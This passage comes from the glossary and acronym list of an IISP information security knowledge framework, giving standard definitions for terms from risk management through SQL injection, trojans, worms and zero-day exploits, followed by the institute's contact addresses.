Risk Avoidance: Informed decision not to be involved in, or to withdraw from, an activity in order not to be exposed to a particular risk. (Source: ISO Guide 73:2009)
Risk Criteria: Terms of reference against which the significance of a risk is evaluated. (Source: ISO/IEC 27005:2011)
Risk Evaluation: Process of comparing the results of risk analysis with risk criteria to determine whether the risk and/or its magnitude is acceptable or tolerable. (Source: ISO/IEC 27005:2011)
Risk Identification: Process of finding, recognizing and describing risks. (Source: ISO/IEC 27005:2011)
Risk IT: Risk IT provides an end-to-end, comprehensive view of all risks related to the use of IT and a similarly thorough treatment of risk management. It is aligned with COBIT.
Risk Management: Coordinated activities to direct and control an organization with regard to risk. (Source: ISO/IEC 27005:2011)
Risk Management Process: Systematic application of management policies, procedures and practices to the activities of communicating, consulting, establishing the context and identifying, analysing, evaluating, treating, monitoring and reviewing risk. (Source: ISO/IEC 27000:2016)
Risk Management Methodology: A methodology that provides a systematic approach to performing risk assessment and then undertaking risk treatment.
Risk Modification: The level of risk should be managed by introducing, removing or altering controls so that the residual risk can be reassessed as being acceptable. (Source: ISO/IEC 27005:2011)
Risk Owner: Person or entity with the accountability and authority to manage a risk. (Source: ISO/IEC 27000:2016)
Risk Retention: Acceptance of the potential benefit of gain, or burden of loss, from a particular risk. (Source: ISO Guide 73:2009)
Risk Sharing: Form of risk treatment involving the agreed distribution of risk with other parties. (Source: ISO Guide 73:2009)
Risk Tolerance: Organization's or stakeholder's readiness to bear the risk after risk treatment in order to achieve its objectives. (Source: ISO Guide 73:2009)
Risk Treatment: Process to modify risk. (Source: ISO/IEC 27005:2011)
Risk Treatment Plan: A plan of actions on how risks, usually found during a vulnerability assessment or penetration test, are to be addressed. Also known as a Remediation Action Plan (RAP).
Role Based Access Control: Role-based access control (RBAC) is a method of controlling access to data or applications based on the roles of individual users within an enterprise.
Rootkit: A set of tools used by an attacker after gaining root-level access to a host to conceal the attacker’s activities on the host and permit the attacker to maintain root-level access to the host through covert means. (Source: NISTIR 7298)
S/MIME: Secure Multi-Purpose Internet Mail Extensions is a secure method of sending e-mail. S/MIME is included in the latest versions of the Web browsers from Microsoft and Netscape.
SABSA: SABSA is a proven framework and methodology used successfully around the globe to meet a wide variety of Enterprise needs including Risk Management, Information Assurance, Governance, and Continuity Management.
Salt: A non-secret value that is used in a cryptographic process, usually to ensure that the results of computations for one instance cannot be reused by an Attacker. (Source: NISTIR 7298)
    A salt is random data that is used as an additional input to a one-way function that "hashes" a password or passphrase. The primary function of salts is to defend against dictionary attacks or against their hashed equivalent, a pre-computed rainbow table attack.

Sarbanes-Oxley Act: The Sarbanes-Oxley Act of 2002 (SOX) is legislation passed by the U.S. Congress to protect shareholders and the general public from accounting errors and fraudulent practices in the enterprise, as well as improve the accuracy of corporate disclosures.

Screened Subnet: A host or network segment inserted as a “neutral zone” between an organisation’s private network and the Internet. Also known as a DMZ (Demilitarized Zone).

Secure Coding: The practice of developing computer software in a way that guards against the accidental introduction of vulnerabilities. Defects, bugs and logic flaws are consistently the primary cause of commonly exploited software vulnerabilities.

Secure Configuration: Also known as hardening.

Secure Sockets Layer: Secure Sockets Layer (SSL) is a security technology for establishing an authenticated and encrypted link between a server and a client—typically a web server and a browser, or a mail server and a mail client. Now overtaken by Transport Layer Security.

Secure the Weakest Link: A security design principle. Usually attackers go after the weakest point in a system. When it comes to secure design, consider the weakest links in a system and ensure that they are secure enough.

Security Assertion Markup Language: Security Assertion Markup Language (SAML) is an XML-based, open-standard data format for exchanging authentication and authorisation data between parties. Can be used to support identity federation.

Security Awareness: The knowledge and attitude members of an organisation possess regarding the protection of the assets of that organisation, including physical and information assets.

Security Culture: Describes the kind of behaviours organisations would like to see in their employees, in areas like cybersecurity, physical security and personnel security.

Security Design Principles: A set of principles used in designing a system or coding an application or services.

Security Development Lifecycle: The Security Development Lifecycle (SDL or SDLC) is a software development process that helps developers build more secure software from its inception all the way to its decommission.

Security Domain: A set of subjects, their information objects, and a common security policy. (Source: NISTIR 7298)
    A collection of entities to which a single security policy, executed by a single authority, applies.
    A domain that implements a security policy and is administered by a single authority.

Security Information and Event Management: Security information and event management (SIEM) software products and services combine security information management (SIM) and security event management (SEM). They provide real-time analysis of security alerts generated by network hardware and applications.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
Security Operating Procedures: A set of security procedures that are usually used to implement a particular policy.

Security Operations Centre: A SOC is a centralised unit that deals with security issues on an organisational and technical level. It is deployed to monitor, detect and handle security incidents.

Security Policy Framework: SPF. Describes the principles and approaches that HMG applies to protect its assets, be they people, infrastructure or information, whilst at the same time assisting in the delivery of public services.

Security Target: Implementation-dependent statement of security needs for a specific identified TOE. (Source: ISO/IEC 15408)

Sensitive Authentication Data: Security-related information (including but not limited to card verification value (CVV), full track data (from the magnetic stripe or equivalent on a chip), PINs, and PIN blocks) used to authenticate cardholders and/or authorize payment card transactions. (Source: PCI DSS)

Sensitive Personal Data: In this Act “sensitive personal data” means personal data consisting of information as to—
    (a) the racial or ethnic origin of the data subject,
    (b) his political opinions,
    (c) his religious beliefs or other beliefs of a similar nature,
    (d) whether he is a member of a trade union (within the meaning of the Trade Union and Labour Relations (Consolidation) Act 1992),
    (e) his physical or mental health or condition,
    (f) his sexual life,
    (g) the commission or alleged commission by him of any offence, or
    (h) any proceedings for any offence committed or alleged to have been committed by him, the disposal of such proceedings or the sentence of any court in such proceedings.
    (Source: Data Protection Act)

Separation of Duties: Separation of Duties (SoD) is the concept of having more than one person required to complete a task. In business the separation by sharing of more than one individual in one single task is an internal control intended to prevent fraud and error. Also known as “Segregation of Duties”. Related to this concept is the Two Person Rule. This requires two persons to complete a particular function, for instance to logon to an administrative account.

Shared Responsibility Model: A shared responsibility model is a cloud security framework that dictates the security obligations of a Cloud Provider and the consumer of its services.

Shoulder Surfing: A type of social engineering technique used to obtain information such as personal identification number, password and other confidential data by looking over the victim's shoulder.

Simple Object Access Protocol: Simple Object Access Protocol (SOAP) is a messaging protocol that allows programs that run on disparate operating systems to communicate using HTTP and the eXtensible Markup Language (XML).

Single Sign-On: Single Sign-On (SSO) is when a user logs in to one client and is then signed in to other clients automatically, regardless of the platform, technology, or domain the user is using.

Situational Awareness: Within a volume of time and space, the perception of an enterprise’s security posture and its threat environment; the comprehension/meaning of both taken together (risk); and the projection of their status into the near future. (Source: NISTIR 7298)
Social Engineering: A general term for attackers trying to trick people into revealing sensitive information or performing certain actions, such as downloading and executing files that appear to be benign but are actually malicious. (Source: NISTIR 7298)

Software as a Service: The capability provided to the consumer is to use the provider’s applications running on a cloud infrastructure. The applications are accessible from various client devices through either a thin client interface, such as a web browser (e.g., web-based email), or a program interface. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, storage, or even individual application capabilities, with the possible exception of limited user-specific application configuration settings. (Source: NIST SP 800-145)

Software Defined Networking: Software-defined networking (SDN) is a term used to describe network technology that is aimed at making the network as agile and flexible as the virtualized server and storage infrastructure of the modern data centre, typically providing cloud services.

Source Authentication: A process that provides assurance of the source of information. See also Authenticity. (Source: NIST SP 800-175B)

Spam: Unsolicited e-mails, which can carry malicious contents and/or scam messages. (Source: ISO/IEC 27033-1:2009)

Span Port: The ability to copy traffic from any or all traffic ports to a single unused port on a network switch. Also called port mirroring.

Spear Phishing: Occurs when attackers obtain information about an individual (e.g. from websites or social networking sites), and customise a phishing attack against that individual.

Spoofing: Impersonating a legitimate resource or user. (Source: ISO/IEC 27033-1:2009)

Spyware: Software that is secretly or surreptitiously installed into an information system to gather information on individuals or organizations without their knowledge; a type of malicious code. (Source: NISTIR 7298)

SQL Injection: A type of code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.

SSL Accelerator: A device that uses separate hardware to perform processor-intensive cryptographic operations for Transport Layer Security (TLS) and its predecessor Secure Sockets Layer (SSL).

Standard: A required or accepted level of quality or achievement. (Source: Oxford English Dictionary)

Stateful Packet Filtering: A firewall technology that monitors the state of active connections and uses this information to determine which IP packets to allow through the firewall.

Stateless Packet Filtering: Looks at each IP packet in isolation and decides whether it should be allowed through purely by inspecting the header information in the IP packet. Stateless packet filtering is usefully performed by network routers. Firewall technology tends to use stateful packet filtering.

Statement of Applicability: The SoA is one of the key documents in an ISO/IEC 27001 ISMS. It identifies the controls relevant to an organisation and explains why those controls have been selected to treat the identified risks.
Static Code Analysis: A method of program debugging that is done by examining the code without executing the program. The process provides an understanding of the code structure, and can help to ensure that the code adheres to industry standards. Automated tools can assist programmers and developers in carrying out static analysis.

Strategy: A plan designed to achieve a particular long-term overall aim. (Source: Oxford English Dictionary)

STRIDE: STRIDE is a system developed by Microsoft for performing threat modelling.

Strong Password: A user password that is complex with a combination of uppercase, lowercase, numbers and special characters. That is a password with good password strength.

Subject: Generally an individual, process, or device causing information to flow among objects or changes to the system state. (Source: NISTIR 7298)
Threat Intelligence: Evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject’s response to that menace or hazard.

Threat Modelling: A process by which potential threats can be identified, enumerated, and prioritised – all from a hypothetical attacker’s point of view. The purpose of threat modelling is to provide defenders with a systematic analysis of the probable attacker’s profile, the most likely attack vectors, and the assets most desired by an attacker.

Threat Scenario: A set of discrete threat events, attributed to a specific threat source or multiple threat sources, ordered in time, that result in adverse effects. (Source: NIST SP 800-30)

Threat Source: The intent and method targeted at the intentional exploitation of a vulnerability, or a situation and method that may accidentally trigger a vulnerability. Synonymous with Threat Agent. (Source: NISTIR 7298)

Tigerscheme: Tigerscheme is a commercial certification scheme for technical security specialists, backed by University standards and covering a wide range of expertise.

Transport Layer Security: Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), both frequently referred to as "SSL", are cryptographic protocols that provide communications security over a computer network. They provide confidentiality, integrity and source authentication protection for the data that is transmitted between different nodes. Used for establishing an encrypted link between a server and a client—typically a web server and a browser, or a mail server and a mail client.

Trojan Horse: A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the program. (Source: NISTIR 7298)

Trustworthy Software Foundation: A UK not-for-profit organisation, with the stated aim of improving software. As taken from the web site: “The Trustworthy Software Foundation (TSFdn) aims to collect, organise and share the wealth of knowledge, experience and capabilities that already exist in the UK public and private sectors and in academia about trustworthy software to give people a joined-up, curated view of the information that is available”.

User Authentication: The process of validating a supplied user identity.

Virtual LAN: Logical segmentation of a LAN into different broadcast domains. A Virtual LAN (VLAN) is set up by configuring ports on a network switch, so devices attached to these ports may communicate as if they were attached to the same physical network segment, although the devices are located on different LAN segments. A VLAN is based on logical rather than physical connections.
Virtual Private Network: A VPN is a private network which is implemented by using the infrastructure of existing networks. From a user perspective a VPN behaves like a private network, and offers similar functionality and services. A VPN can be used in various situations, such as to: (Source: ISO/IEC 27033-1:2009)
    • Implement remote access to an organization from mobile or off-site employees,
    • Link different locations of an organization together, including redundant links to implement a fall-back infrastructure,
    • Set up connections to an organization’s network for other organizations/business partners.

Virus: Computer program that self-replicates and automatically spreads between systems. A form of malware.

Virus Signature: A virus signature is the fingerprint of a virus. It is a set of unique data, or bits of code, that allow it to be identified. Antivirus software uses a virus signature to find a virus in a computer file system, allowing it to detect, quarantine and remove the virus.

Vulnerability: Weakness of an asset or control that can be exploited by one or more threats. (Source: ISO/IEC 27000:2016)

Vulnerability Assessment: Vulnerability assessment is the process of identifying vulnerabilities within a system. This could be a software system, a physical system or even a mechanical system, and the testing can be targeted to focus on components that might be technical, physical or even administrative in their nature. Typically a vulnerability assessment does not try to break into a system – unlike penetration testing. Vulnerability assessment is where tools are used to scan a system or network for a list of known vulnerabilities, such as system misconfiguration, outdated software, or a lack of patching.

Vulnerability Management: The practice of identifying, classifying and mitigating vulnerabilities. Vulnerabilities can come from vulnerability assessments, external sources or from threat intelligence.

Warning, Advice and Reporting Point: Warning, Advice and Reporting Point (WARP) is a community or internal company-based service to share advice and information on computer-based threats and vulnerabilities.

Web Application Firewall: A firewall that monitors, filters or blocks the HTTP traffic to and from a Web application. They typically reside on a server.

Web Filtering: A program or device that screens an incoming web page and restricts or controls its content.

White Box Testing: White box testing is when information about the organisation’s application, infrastructure or network is provided to the tester. The tester performs the test with full knowledge of the infrastructure, defence mechanisms and communication channels of the target organisation.

Whitelist: A list of people or things considered to be acceptable or trustworthy. (Source: Oxford English Dictionary)

Worm: A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Unlike a computer virus, it does not need to attach itself to an existing program.

WS-Security: An extension to SOAP to apply security to Web services. It was published by OASIS.
Zero-Day Exploit: A ‘zero-day’ is a vulnerability which is not publicly known and has not been patched by the software developer. The exploit is how a zero-day vulnerability is leveraged.
5. Abbreviations and Acronyms
3DES: Triple DES
AH: Authentication Header
AV: Antivirus
BCS: The Chartered Institute for IT (formerly known as the British Computer Society)
CA: Certificate Authority; Certification Authority
CC: Common Criteria
CI: Configuration Item
CISSP: Certified Information Systems Security Professional
CVSS: Common Vulnerability Scoring System
DH: Diffie-Hellman
DR: Disaster Recovery
EA: Enterprise Architecture
EAL: Evaluation Assurance Level
EE: End Entity
HR: Human Resource
HRA: Human Rights Act
IPC: Investigatory Powers Commission
MIB: Management Information Base
MITM: Man-in-the-Middle
NVLAP: National Voluntary Laboratory Accreditation Program
PHP: Originally stood for Personal Home Page; it now stands for PHP: Hypertext Preprocessor
PLC: Programmable Logic Controller
RA: Registration Authority
RSA: Rivest-Shamir-Adleman
SA: Security Architect; Security Association
SASL: Simple Authentication and Security Layer
SSE-CMM: Systems Security Engineering Capability Maturity Model
ST: Security Target
TCP/IP: Transmission Control Protocol (TCP) and the Internet Protocol (IP)
VA: Validation Authority
VM: Virtual Machine
WARP: Warning, Advice and Reporting Point
6. Skill Areas to Knowledge Areas
On the following page is a mind map containing a mapping from the IISP Skill Areas to the various Knowledge Areas and sub-areas. You will notice that many of the IISP Skill Areas map to more than one Knowledge Area.
A separate png file of the mind map is available.
Evesham & Postal Office
Basepoint Business Centre
Crab Apple Way
Evesham
Worcestershire
WR11 1GP
London Office
CAN Mezzanine
32-36 Loman Street
London
SE1 0EH
Website: www.iisp.org